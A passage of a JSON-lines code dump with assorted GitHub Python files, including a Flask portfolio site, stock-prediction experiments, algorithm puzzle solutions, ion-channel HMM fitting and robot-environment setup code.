(Project.title==project['title']).one_or_none())\n if project_in_db == None:\n id = project['id']\n title = project['title']\n date = datetime.strptime(project['date'],'%B %Y').date()\n description = project['description']\n skills = project['skills']\n url = project['url']\n new_project = Project(id=id, title=title, date=date, \n description=description, \n skills=skills, url=url)\n db.session.add(new_project)\n db.session.commit()\n \n\n@app.route('/')\ndef index():\n projects = Project.query.all()\n return render_template('index.html', projects=projects)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n@app.route('/project/new', methods=['GET', 'POST'])\ndef add_project():\n projects = Project.query.all()\n if request.form:\n new_project = Project(title=request.form['title'], \n date=datetime.strptime(request.form['date'], '%Y-%m').date(),\n description=request.form['desc'], \n skills=request.form['skills'], \n url=request.form['github'])\n db.session.add(new_project)\n db.session.commit()\n return redirect(url_for('index'))\n return render_template('projectform.html', projects=projects)\n\n\n@app.route('/project/<id>')\ndef detail(id):\n projects = Project.query.all()\n project = Project.query.get_or_404(id)\n return render_template('detail.html', project=project, \n projects=projects)\n\n\n@app.route('/project/<id>/edit', methods=['GET', 'POST'])\ndef edit_project(id):\n project = Project.query.get_or_404(id)\n if request.form:\n project.title=request.form['title']\n project.date=datetime.strptime(request.form['date'], '%Y-%m').date()\n project.description=request.form['desc'] \n project.skills=request.form['skills'] \n project.url=request.form['github']\n db.session.commit()\n return redirect(url_for('detail', id=id))\n return render_template('edit_project.html', project=project)\n\n\n@app.route('/project/<id>/delete')\ndef delete_project(id):\n project = Project.query.get_or_404(id)\n db.session.delete(project)\n db.session.commit()\n return redirect(url_for('index', project=project))\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html', msg=error), 404\n\n\nif __name__ == '__main__':\n with app.app_context():\n db.create_all()\n insert_project_data()\n app.run(debug=True, port=8000, host='0.0.0.0')\n \n \n ","repo_name":"chelsearumsey/Project-5---Portfolio-with-SQLAlchemy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73965627784","text":"import sys\nsys.path.append('../')\nimport numpy as np\nimport tensorflow as tf\n\nimport hparam as conf\nimport sessionWrapper as sesswrapper\nfrom utility import dataProcess as dp\nfrom utility import general_utility as gu\nimport model_zoo as mz\nimport loss_func as l\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import preprocessing\nimport trial_xgboost_ensCls as ens\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nfrom utility_trial import *\n\nsrcPath = '/home/ubuntu/dataset/etf_prediction/all_feature_data_Nm_1_MinMax_94.pkl'\ntv_gen = dp.train_validation_generaotr()\n*_,meta = gu.read_metafile('/home/ubuntu/dataset/etf_prediction/all_meta_data_Nm_1_MinMax_94.pkl')\nf = tv_gen._load_data(srcPath)\n\ndp_ = dp.data_processor(srcPath)\n\n#stock_list = ['0050', '0051', '0052', '0053', '0054', '0055', '0056', '0057', '0058', '0059', '006201', \n# '006203', '006204', '006208','00690', '00692', '00701', '00713']\n\nstock_list = ['0050']\nperiod = None\ndf = pd.DataFrame({'date':f.columns})\ndf['date'] = pd.to_datetime(df['date'])\ndf['dow'] = df['date'].dt.dayofweek\n\n#********Get Monday data*********\n\n\n#for s in stock_list:\n#\n# single_stock = tv_gen._selectData2array(f, [s], period)\n# dow_array = np.array(df['dow'][-len(single_stock):])\n# dow_array_mask = np.equal(dow_array, 2)\n# monday_stock = single_stock[dow_array_mask]\n# \n# data = monday_stock[:-1]\n# label = np.argmax(monday_stock[1:, -3:], axis=-1)\n# \n# fe = feature_extractor(meta, data)\n# ud, _ = fe.ratio()\n# data_feature = ud\n# train_val_set = dp_.split_train_val_set(data_feature, label, 0.1)\n# \n# train_data = train_val_set['train']\n# test_data = train_val_set['test']\n# train_label = train_val_set['train_label']\n# test_label = train_val_set['test_label']\n# \n# model = xgb.XGBClassifier(max_depth=3, learning_rate=0.05 ,n_estimators=500, silent=False)\n# model.fit(train_data, train_label)\n# y_xgb_train = model.predict(train_data)\n# y_xgb_valid = model.predict(test_data)\n# \n# print(\"Train Accuracy [ratio]: \", accuracy_score(y_xgb_train, train_label))\n# print(\"Validation Accuracy [ratio]: \",accuracy_score(y_xgb_valid, test_label))\n# \n \n#********Combine two days data*********\n \n\n\n\ndef get_data_from_dow(stocks, meta, lagfday, feature_list = ['ratio']):\n \n df = pd.DataFrame({'date':f.columns})\n df['date'] = pd.to_datetime(df['date'])\n df['dow'] = df['date'].dt.dayofweek\n dow_array = np.array(df['dow'][-len(single_stock):])\n dow_array_mask_mon = np.equal(dow_array, lagfday)\n \n def get_mask(dow_array_mask_mon):\n for i in range(5):\n dow_array_mask_mon[i] = False\n \n dow_array_mask = [dow_array_mask_mon]\n for j in range(1, 5):\n tmp_mask = np.zeros(np.shape(dow_array_mask_mon), np.bool)\n for i in range(1, len(dow_array_mask_mon)):\n if dow_array_mask_mon[i] == True: \n tmp_mask[i-j] = True \n else: \n tmp_mask[i] = False\n dow_array_mask.append(tmp_mask)\n return dow_array_mask\n\n dow_array_mask = get_mask(dow_array_mask_mon)\n \n \n dow = {0:'mon', 1:'tue', 2:'wed', 3:'thu', 4:'fri'}\n features = {}\n \n for d in range(5):\n features[dow[d]] = {}\n shifted_stock = stocks[dow_array_mask[d]]\n shifted_stock = shifted_stock[:-1]\n \n fe = feature_extractor(meta, shifted_stock)\n \n for feature_name in feature_list:\n features[dow[d]][feature_name], _ = getattr(fe, feature_name)()\n \n label = np.argmax(stocks[dow_array_mask[0]][1:, -3:], axis=-1)\n \n return features, label\n\nstock_list = ['0050', '0051', '0052', '0053', '0054', '0055', '0056', '0057', '0058', '0059', '006201', \n '006203', '006204', '006208','00690', '00692', '00701', '00713']\n\n\nbest_config = {}\npredict_days = list(range(5))\nconsider_lagdays = list(range(1,6))\nfeature_list_comb = [['ratio'],\n ['rsi'],\n ['kdj'],\n ['macd'],\n ['ud']]\n\nfor s in stock_list:\n best_config[s] = {}\n for predict_day in predict_days:\n best_config[s][predict_day] = {}\n best_accuracy = 0\n for consider_lagday in consider_lagdays:\n for feature_list in feature_list_comb:\n \n \n single_stock = tv_gen._selectData2array(f, [s], period)\n features, label = get_data_from_dow(single_stock, meta, predict_day, feature_list)\n \n feature_concat = []\n dow = {0:'mon', 1:'tue', 2:'wed', 3:'thu', 4:'fri'}\n \n for i in range(consider_lagday):\n for k in features[dow[i]]:\n feature_concat.append( features[dow[i]][k])\n \n \n data_feature = np.concatenate(feature_concat, axis=1)\n \n train_val_set_days = dp_.split_train_val_set(data_feature, label, 0.1)\n \n \n train_data = train_val_set_days['train']\n test_data = train_val_set_days['test']\n train_label = train_val_set_days['train_label']\n test_label = train_val_set_days['test_label']\n \n model = xgb.XGBClassifier(max_depth=3, learning_rate=0.05 ,n_estimators=500, silent=False)\n model.fit(train_data, train_label)\n y_xgb_train = model.predict(train_data)\n y_xgb_valid = model.predict(test_data)\n \n print(\"Train Accuracy [ratio]: \", accuracy_score(y_xgb_train, train_label))\n print(\"Validation Accuracy [ratio]: \",accuracy_score(y_xgb_valid, test_label))\n \n if accuracy_score(y_xgb_valid, test_label) > best_accuracy:\n best_config[s][predict_day] = {'train acc': accuracy_score(y_xgb_train, train_label),\n 'test_acc': accuracy_score(y_xgb_valid, test_label),\n 'days': consider_lagday,\n 'features': feature_list}\n best_accuracy = accuracy_score(y_xgb_valid, test_label)\n \n \n \n \n\n \n \n \n\n","repo_name":"dashmoment/etf_prediction","sub_path":"trial/trial_split_by_dow.py","file_name":"trial_split_by_dow.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70788915466","text":"from collections import Counter\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n\n combo_sums = []\n\n n = len(candidates)\n\n def _dfs(combo=[], combo_sum=0, idx=0):\n\n if combo_sum > target: return\n\n if combo_sum == target: combo_sums.append(combo); return\n\n # iterate through all potential answers\n for i in range(idx, n):\n _dfs(combo + [candidates[i]], combo_sum + candidates[i], i)\n\n _dfs()\n\n return combo_sums\n\n\n","repo_name":"Drblessing/leetcode","sub_path":"Combination Sum.py","file_name":"Combination Sum.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70953006025","text":"from setuptools import setup, find_packages\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\nsetup(name='bx24_orm',\n version='0.0.2',\n description='Easy to use Django-styled API wrapper for Bitrix 24',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/dmitriilazukov/bx24_orm',\n author='Dmitrii Lazukov',\n author_email='dmitriilazukov@gmail.com',\n license='MIT',\n packages=find_packages(where='.', exclude='bx24_settings'),\n entry_points={\n 'console_scripts': ['bx24_cmd=bx24_orm.scripts.command_line:bx24_cmd'],\n },\n install_requires=[\n 'requests',\n 'six',\n 'python-dateutil'\n ],\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n ],\n zip_safe=False)\n","repo_name":"dmitriilazukov/bx24_orm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"11344227051","text":"# https://www.acmicpc.net/problem/16916\n# 부분 문자열 구하기 _ Rabin-Karp Algorithm\n# 836ms\ndef h(s):\n num = 0\n for c in s:\n num = (num * base + ord(c)) % mod\n return num\n\n\ndef match(s, p):\n n, m = len(s), len(p)\n if n<m:\n return 0\n first = 1\n for i in range(m-1):\n first = (first * base) % mod\n hash_p = h(p)\n hash_s = h(s[0:0 + m])\n for i in range(n - m+1):\n\n if hash_p == hash_s:\n return 1\n if i+m<n:\n hash_s = hash_s - (ord(s[i])*first)%mod\n hash_s = (hash_s+mod)%mod\n hash_s = ((hash_s*base)%mod+ord(s[i+m]))%mod\n\n return 0\n\nimport sys\nmod = 2147483647\nbase = 256\ns = sys.stdin.readline().strip() # strip 을 안해주면 whitespace가 들어감\np = sys.stdin.readline().strip()\nprint(match(s, p))\n","repo_name":"MinMolang/codePractice","sub_path":"BOJ/BOJ16916(라빈카프).py","file_name":"BOJ16916(라빈카프).py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24713099426","text":"def solution(record):\n answer = []\n nickname_dict = {}\n\n ENTER_KEY = \"Enter\"\n LEAVE_KEY = \"Leave\"\n CHANGE_KEY = \"Change\"\n\n for desc in record:\n if CHANGE_KEY in desc or ENTER_KEY in desc:\n _, uid, nickname = desc.split(\" \")\n nickname_dict[uid] = nickname\n\n for desc in record:\n if ENTER_KEY in desc:\n _, uid, nickname = desc.split(\" \")\n answer.append(nickname_dict[uid] + \"님이 들어왔습니다.\")\n\n if LEAVE_KEY in desc:\n _, uid = desc.split(\" \")\n answer.append(nickname_dict[uid] + \"님이 나갔습니다.\")\n\n return answer\n","repo_name":"sojinjang/algorithm","sub_path":"programmers/Lv.2/kakao/오픈채팅방.py","file_name":"오픈채팅방.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7805701521","text":"import csv\r\nimport matplotlib.pyplot as plt\r\n\r\nf = open('c:/temp/weather.csv')\r\ndata = csv.reader(f)\r\nheader = next(data) # 헤더제거\r\n\r\nmonthly_wind = list(range(12))\r\ndays_counted = [x for x in range(12)]\r\n\r\nfor row in data:\r\n month = int(row[0][5:7]) # 일시에서 월 데이터만 추출 2010-\"08\"-01\r\n if row[3] != '': # 공백이 아니면 바람이 붐\r\n wind = float(row[3]) # wind에 최대풍속값 담기\r\n monthly_wind[month-1] += wind # 월에 해당아는 인덱스에 풍속값 더하기 -> 누적되는 수\r\n days_counted[month-1] += 1 # 월에 분 풍속 일수를 세기 위한 변수\r\n\r\n\r\nfor i in range(12):\r\n monthly_wind[i] /= days_counted[i] # 총 풍속값을 바람이 분 날짜 일수로 나누어서 평균 확인\r\n\r\nplt.plot(monthly_wind, 'blue')\r\nplt.show()\r\n\r\nf.close()","repo_name":"zxxng/Python-MySQL","sub_path":"12주차_pandas_실습코드/data/실습I.py","file_name":"실습I.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9031184826","text":"\r\nimport requests\r\n\r\n#Forms an asynch request to download an html file\r\n# containing the card data.\r\n\r\nurl = \"https://gwent.one/search/ajax\"\r\n\r\nheaders={ \r\n\t'content-type':'application/x-www-form-urlencoded; charset=UTF-8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0',\r\n }\r\n\t\r\n\t\r\ndata = {\r\n\t'v' : '8.0.0',\r\n\t'total' : '998',\r\n\t'lang' : 'en',\r\n\t'page' : '1'\r\n}\r\n\r\nreq = requests.post(url, data=data, headers=headers);\r\n\r\nwith open(\"cardsHtml.html\", \"w\", encoding=\"utf-8\") as outHtml:\r\n\toutHtml.write(req.text);\r\n","repo_name":"ATaylorEmmons/Card-Analytics","sub_path":"Gwent/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17522395961","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 10 16:16:08 2020\n\n@author: francesco\n\"\"\"\nimport Hidden_Marcov_chain as MC1\nimport lgbm_functions as LF\nimport MultiGaussianModel as MGM\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nfont = {'family' : 'normal',\n 'weight' : 'normal',\n 'size' : 40}\n\nmatplotlib.rc('font', **font)\nmatplotlib.rcParams['figure.figsize'] = (24, 20)\n\n\n\npath = '/home/francesco/Machine_learning/PyTorch/liverpool-ion-switching'\nos.chdir(path)\n\ntest = pd.read_csv('train.csv')\n\n\n\ntime = test['time'].values \nsignal = test['signal'].values\n\n\n\n# %%\n\n\ni_blocks = [int(i*1e+5) for i in range(1, 11)] + [ int(1.5e+6), int(2.0e+6) ] \n\n\nclean_signal, i0 = np.array([]), 0\n\nfor i1 in i_blocks:\n clean_signal_ = MGM.remove_drift(s=signal[i0:i1], t=time[i0:i1])\n clean_signal = np.append(clean_signal, clean_signal_)\n i0 = i1\n\n\n# %% plot test data\n\n\n#fig, (ax1) = plt.subplots(1, 1, sharex=True, figsize=(8, 8))\n#ax1.plot(time, clean_signal, marker='.', lw=0, markersize=0.02, color='black')\n\n\n\n# %%\n\nblocks, i0 = [], 0 \nfor i1 in i_blocks:\n #\n blocks += [MGM.SingleBlock(signal = clean_signal[i0:i1], time = time[i0:i1] )] \n i0 = i1 \n \n \n\n# %%\n\n\nfor i, B in enumerate(blocks):\n # # # \n MGM.fit_single_block_with_MGM(single_block=B, plot=True, f=[0.4, 0.9])\n \n\n\n\n# %% Predict Using Markov Chain\n \n \nall_pred = np.array([])\nt_out = np.array([]) \n\nfor i, B in enumerate(blocks):\n logQ = B.s\n y_true = B.c\n \n \n params = {'n_components' : len(B.predicted_channels),\n 'means_' : B.MultiNormalFit[:,1],\n 'covars_' : B.MultiNormalFit[:,2].mean()**2,\n }\n \n my_model = MC.fitHMM(Q=logQ, parameters=params)\n \n y_pred = MC.prediction_GaussianHMM(X=logQ, real_values=B.predicted_channels, \n model=my_model)\n\n all_pred = np.append(all_pred, y_pred) \n t_out = np.append(t_out, B.t) \n \n print()\n\n\n\n# %% Predict Using Markov Chain1\n \n \nall_pred = np.array([])\nt_out = np.array([]) \n\nfor i, B in enumerate(blocks):\n logQ = B.s\n y_true = B.c\n\n\n mus = B.MultiNormalFit[:,1]\n sig = B.MultiNormalFit[:,2].mean() \n \n my_model = MC1.fit_HMM_Normal(Q=logQ, mus=mus, sig=sig)\n \n y_pred = MC1.prediction_HMM_Normal(X=logQ, real_values=B.predicted_channels, \n model=my_model)\n\n all_pred = np.append(all_pred, y_pred) \n t_out = np.append(t_out, B.t) \n\n \n\n\n# %%\nprint(all_pred.shape) \nprint(t_out.shape)\n\n# %%\n\n\nfor i, B in enumerate(blocks): \n MGM.infer_block_type(B=B) \n print(i, B.block_type) \n\n\n\n\n\n# %%\ny_pred = np.array([])\nt_out = np.array([]) \nfor B in blocks:\n y_pred_, _ = LF.prediction_multi_models([B])\n y_pred = np.append(y_pred, y_pred_)\n t_out = np.append(t_out, B.t) \n \n \n# %% \n \nsub = pd.DataFrame({'time': t_out, 'open_channels': all_pred.astype(np.int)})\n\nsub.to_csv('sub1.csv', float_format='%0.4f', index=False) \n \n \n\n\n ","repo_name":"FrancescopR/Ion_switching","sub_path":"tests/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41728871882","text":"import pandas as pd\n\n\ndef decode_labels(label_file, attributes):\n \"\"\" from [0 1 0 0 ..] to 'wheel' \"\"\"\n labels = pd.read_csv(label_file, delimiter=' ', index_col=0, header=None)\n labels_encoded = []\n fnames = []\n for f, row in labels.iterrows():\n fnames.append(f)\n labels_encoded.append(attributes[row.idxmax() - 1])\n return fnames, labels_encoded","repo_name":"nadezola/AttributeClassification","sub_path":"lib/decode_labels.py","file_name":"decode_labels.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74576281863","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n##########################################################################\n#\t> File Name: data-handle.py\n#\t> Author: Tingjian Lau\n#\t> Mail: tjliu@mail.ustc.edu.cn\n#\t> Created Time: 2016/09/29\n#\t> Detail: \n#########################################################################\n\nimport numpy as np\nimport theano\nimport theano.tensor as T\n\nclass DataHandle(object):\n def __init__(self, seq_length=10, row_interval=[1, 5], axes=[0, 0],\n delimiter='\\t', del_table_header=True):\n self._row_start = row_interval[0]\n self._row_end = row_interval[1]\n self._seq_length = seq_length\n self._axis1=axes[0]\n self._axis2=axes[1]\n self._delimiter=delimiter\n self._del_table_header=del_table_header\n\n '''\n def load_data(self, data_path):\n params:\n ------\n seq_length: 将seq_length条数据拼接成一条\n axis1,axis2: 通过比较第seq_length个样本的第aixs2维的值与\n 第seq_length+1个样本的第axis1的值得到类号\n del_table_header: 是否删除第一行,即表头\n delimiter: 数据的分隔符\n return: 拼接好之后的数据集和类号\n\n print(\"Loading data from {} ...\".format(data_path))\n data = open(data_path, 'r')\n data_set_x = []\n for line in data:\n data_set_x.append(line.split('\\n')[0].split(self._delimiter)[self._row_start:self._row_end])\n data.close()\n if self._del_table_header:\n data_set_x = data_set_x[1::]\n\n data_set_y = []\n new_len = len(data_set_x)-self._seq_length\n for i in range(new_len):\n if data_set_x[i+self._seq_length-1][self._axis1] > data_set_x[i+self._seq_length][self._axis2]:\n data_set_y.append(0)\n else:\n data_set_y.append(1)\n\n for j in range(self._seq_length-1):\n data_set_x[i].extend(data_set_x[i+j+1])\n\n return data_set_x[0:new_len], data_set_y\n '''\n def joint_x_gen_y(self, data_set_x):\n # 用于日线数据的拼接和生成类号\n data_set_y = []\n new_len = len(data_set_x)-self._seq_length\n for i in range(new_len):\n if data_set_x[i+self._seq_length-1][self._axis1] > data_set_x[i+self._seq_length][self._axis2]:\n data_set_y.append(0)\n else:\n data_set_y.append(1)\n\n for j in range(self._seq_length-1):\n data_set_x[i].extend(data_set_x[i+j+1])\n\n return data_set_x[0:new_len], data_set_y\n\n def load_data(self, data_path):\n print(\"Loading data from {} ...\".format(data_path))\n data = open(data_path, 'r')\n data_set_x = []\n for line in data:\n data_set_x.append(line.split('\\n')[0].split(self._delimiter)[self._row_start:self._row_end])\n data.close()\n if self._del_table_header:\n data_set_x = data_set_x[1::]\n\n return data_set_x\n\n def minmax_norm(self, data_set):\n data = np.zeros((len(data_set), len(data_set[0]))) \n\n for i in range(len(data_set)):\n for j in range(len(data_set[0])):\n data[i][j] = data_set[i][j]\n\n max = np.amax(data, axis=0)\n min = np.amin(data, axis=0)\n\n for i in range(data.shape[0]):\n data[i] = (data[i] - min) / (max - min)\n\n return data\n\n def shared_dataset_x(self, data_set_x, borrow=True):\n shared_x = theano.shared(np.asarray(data_set_x, dtype=theano.config.floatX), borrow=borrow)\n\n return shared_x\n\n def shared_dataset_y(self, data_set_y, borrow=True):\n shared_y = theano.shared(np.asarray(data_set_y,dtype=theano.config.floatX),borrow=borrow)\n\n return T.cast(shared_y, 'int32')\n\n def get_datasets(self, datapath):\n '''\n params:\n ------\n datapath: list\n 加载的路径列表\n return: \n ------\n 以列表的形式返回所有的数据集和类号\n '''\n unshared_datasets = []\n shared_datasets = []\n for i in range(len(datapath)):\n #data_set_x, data_set_y = self.load_data(datapath[i])\n data_set_x = self.load_data(datapath[i])\n data_set_x, data_set_y = self.joint_x_gen_y(data_set_x)\n unshared_datasets.append((data_set_x, data_set_y))\n # 归一化\n data_set_x = self.minmax_norm(data_set_x)\n # 转化为共享变量\n data_set_x = self.shared_dataset_x(data_set_x)\n data_set_y = self.shared_dataset_y(data_set_y)\n shared_datasets.append((data_set_x, data_set_y))\n\n return shared_datasets, unshared_datasets\n\n\nclass DataHandle_minute(DataHandle):\n def __init__(self, seq_length=10, row_interval=[1, 5], axes=[0, 0],\n delimiter='\\t', del_table_header=True, row_mid=2):\n # 调用父类的init函数\n DataHandle.__init__(self, seq_length, row_interval, axes, delimiter,\n del_table_header)\n self._row_mid = row_mid\n \n\n def joint_x_gen_daily(self, data_set_x):\n '''\n 在处理分钟数据时,data_set_x的前两唯是日期和分钟时刻\n return: 拼接好的分钟数据和计算后的日线数据\n '''\n data_range = []\n data_range.append(0)\n for i in xrange(len(data_set_x)):\n if data_set_x[i][0] != data_set_x[data_range[-1]][0]:\n data_range.append(i)\n data_range.append(len(data_set_x))\n\n\n data_daily = [] # 存放由分钟时刻数据计算出的日线数据\n data_minute = [] # 存放拼接后的每天的分钟时刻数据\n for i in range(len(data_range)-1):\n open_price = data_set_x[data_range[i]][self._row_mid]\n close_price = data_set_x[data_range[i+1]-1][self._row_mid+3]\n high_price = 0\n low_price = 100000\n minute_item = [] # 存放拼接后某一天的分钟时刻数据\n for j in range(data_range[i], data_range[i+1]):\n for k in range(self._row_mid, self._row_end):\n minute_item.append(float(data_set_x[j][k]))\n if high_price < float(data_set_x[j][self._row_mid+1]):\n high_price = float(data_set_x[j][self._row_mid+1])\n if low_price > float(data_set_x[j][self._row_mid+2]):\n low_price = float(data_set_x[j][self._row_mid+2])\n data_minute.append(minute_item)\n # 当天的数据\n data_daily.append([float(open_price), high_price, float(close_price), low_price]) \n\n for item in data_minute:\n assert(len(item)%48==0)\n break\n with open('tmp.txt', 'wb') as f:\n for item in data_daily:\n f.write('%s\\n' % item)\n\n with open('tmp2.txt', 'wb') as f:\n for item in data_minute:\n f.write('%s\\n' % item)\n '''\n 暂时不考虑数据损坏的情况,如出现11:35,15:05\n bad_data = []\n for i in range(len(data_range)-1):\n if data_range[i+1] - data_range[i] != 48:\n print(data_range[i+1])\n #print(len(data_range))\n '''\n\n\n return data_daily, data_minute \n\n def get_datasets(self, datapath):\n '''\n params:\n ------\n datapath: list\n 加载的路径列表\n return: \n ------\n unshared_datasets: 为LSTM准备的数据集\n shared_datasets: 为RBMs准备的数据集\n 以列表的形式返回所有的数据集和类号\n '''\n\n unshared_datasets = []\n shared_datasets = []\n for i in range(len(datapath)):\n data_set_x = self.load_data(datapath[i])\n data_daily, data_minute = self.joint_x_gen_daily(data_set_x)\n data_daily_x, data_daily_y = self.joint_x_gen_y(data_daily)\n unshared_datasets.append((data_minute, data_daily_y)) \n # 归一化\n data_minute = self.minmax_norm(data_minute)\n # 转化为共享变量\n data_minute = self.shared_dataset_x(data_minute)\n shared_datasets.append(data_minute)\n\n return shared_datasets, unshared_datasets\n \n\n\n \n","repo_name":"tingjianlau/tjliu-DeepLearningTutorials","sub_path":"DataHandle.py","file_name":"DataHandle.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"33038052248","text":"class Solution:\n def validPalindrome(self, s: str) -> bool:\n l=0\n r=len(s)-1\n while l<r:\n if s[l]!=s[r]:\n skipleft=s[l+1:r+1]\n print(skipleft)\n print(r+1)\n skipright=s[l:r]\n print(r)\n print(skipright)\n print(skipright[::-1])\n return (skipleft[::-1]==skipleft or skipright[::-1]==skipright)\n l+=1 \n r-=1\n return True\n ","repo_name":"niksintelli4ever/LeetCode-Journey","sub_path":"0680-valid-palindrome-ii/0680-valid-palindrome-ii.py","file_name":"0680-valid-palindrome-ii.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42904474599","text":"\"\"\"\nmaps and double linked list\na double linked list can be used as a LRU cache\na dictionary can be used to map the keys to the nodes to facilitate constant, i.e. O(1), lookups insertions and deletions\nadded print lines to the cache lookups to see value in console.\n\n\"\"\"\n\nclass Node():\n def __init__(self, key=0, value=0):\n self.next = None\n self.prev = None\n self.value = value\n self.key = key\n\nclass LRU_Cache(object):\n\n def __init__(self, capacity=5):\n # Initialize class variables\n self.maxsize = capacity\n self.map = dict() #should be a map of the key and the node for the value\n self.head = None\n self.tail = None\n\n pass\n\n def get(self, key):\n # Retrieve item from provided key. Return -1 if nonexistent.\n cache_map = self.map\n cache_node = cache_map.get(key)\n if self.head == cache_node:\n return cache_node.value\n if cache_node != None:\n if self.tail != cache_node:\n nxt = cache_node.next\n if nxt.prev != None:\n nxt.prev = cache_node.prev\n elif self.tail == cache_node:\n self.tail = cache_node.prev\n prev = cache_node.prev\n if prev.next != None:\n prev.next = cache_node.next\n head = self.head\n head.prev = cache_node \n cache_node.next = head\n cache_node.prev = None\n self.head = cache_node\n\n return cache_node.value\n\n return -1\n pass\n\n def set(self, key, value):\n # Set the value if the key is not present in the cache. If the cache is at capacity remove the oldest item. \n cache_map = self.map\n cache_item = Node(key, value)\n if self.head == None:\n self.head = cache_item\n self.tail = cache_item\n else:\n if len(cache_map) == self.maxsize:\n tail = self.tail\n cache_map.pop(tail.key)\n self.tail = tail.prev\n\n cache_item.next = self.head\n old_head = self.head\n old_head.prev = cache_item\n self.head = cache_item\n\n cache_map[key] = cache_item \n pass\n\nour_cache = LRU_Cache(5)\nsecond_cache = LRU_Cache()\nthird_cache = LRU_Cache(-1)\n\nour_cache.set(1, 1)\nour_cache.set(2, 2)\nour_cache.set(3, 3)\nour_cache.set(4, 4)\n\nprint(\"First test\")\nprint(our_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nour_cache.set(5, 5) \nour_cache.set(6, 6)\n\nprint(our_cache.get(6))\nprint(our_cache.get(3)) # returns -1 because the cache reached it's capacity and 3 was the least recently used entry\n\nsecond_cache.set(1, 1)\nsecond_cache.set(2, 2)\nsecond_cache.set(3, 3)\nsecond_cache.set(4, 4)\n\nprint(\"Second test\")\nprint(second_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nsecond_cache.set(5, 5) \nsecond_cache.set(6, 6)\n\nprint(second_cache.get(6))\nprint(second_cache.get(3))\n\nthird_cache.set(1, 1)\nthird_cache.set(2, 2)\nthird_cache.set(3, 3)\nthird_cache.set(4, 4)\n\nprint(\"Third test\")\nprint(third_cache.get(1)) # returns 1\nprint(third_cache.get(2)) # returns 2\nprint(third_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nthird_cache.set(5, 5) \nthird_cache.set(6, 6)\n\nprint(third_cache.get(6))\nprint(third_cache.get(3)) ","repo_name":"reaprman/Data-Struct-algo-nanodegree","sub_path":"proj2/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74856295623","text":"import abc\nfrom typing import Any, Dict, Optional, Sequence, Tuple\n\nimport gym\nimport numpy as np\nfrom transforms3d.euler import euler2mat, mat2euler\n\nfrom dsuite.components.robot import DynamixelRobotComponent, RobotState\nfrom dsuite.components.tracking import VrTrackerComponent, TrackerState\nfrom dsuite.dkitty.config import (\n DEFAULT_DKITTY_CALIBRATION_MAP, DKITTY_SIM_CONFIG, DKITTY_HARDWARE_CONFIG,\n TRACKER_SIM_CONFIG, TRACKER_HARDWARE_CONFIG)\nfrom dsuite.dkitty import scripted_reset\nfrom dsuite.robot_env import make_box_space, RobotEnv\n\n# The position offset for tracking in hardware.\nKITTY_HW_TRACKER_OFFSET = np.array([0, 0, 0.35])\n\n\nclass BaseDKittyEnv(RobotEnv, metaclass=abc.ABCMeta):\n \"\"\"Base environment for all DKitty robot tasks.\"\"\"\n\n @classmethod\n def get_robot_config(cls,\n device_path: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"Returns the robot configuration for the given device path.\"\"\"\n if device_path is not None:\n config = DKITTY_HARDWARE_CONFIG.copy()\n config['device_path'] = device_path\n scripted_reset.add_groups_for_reset(config['groups'])\n # Calibrate the 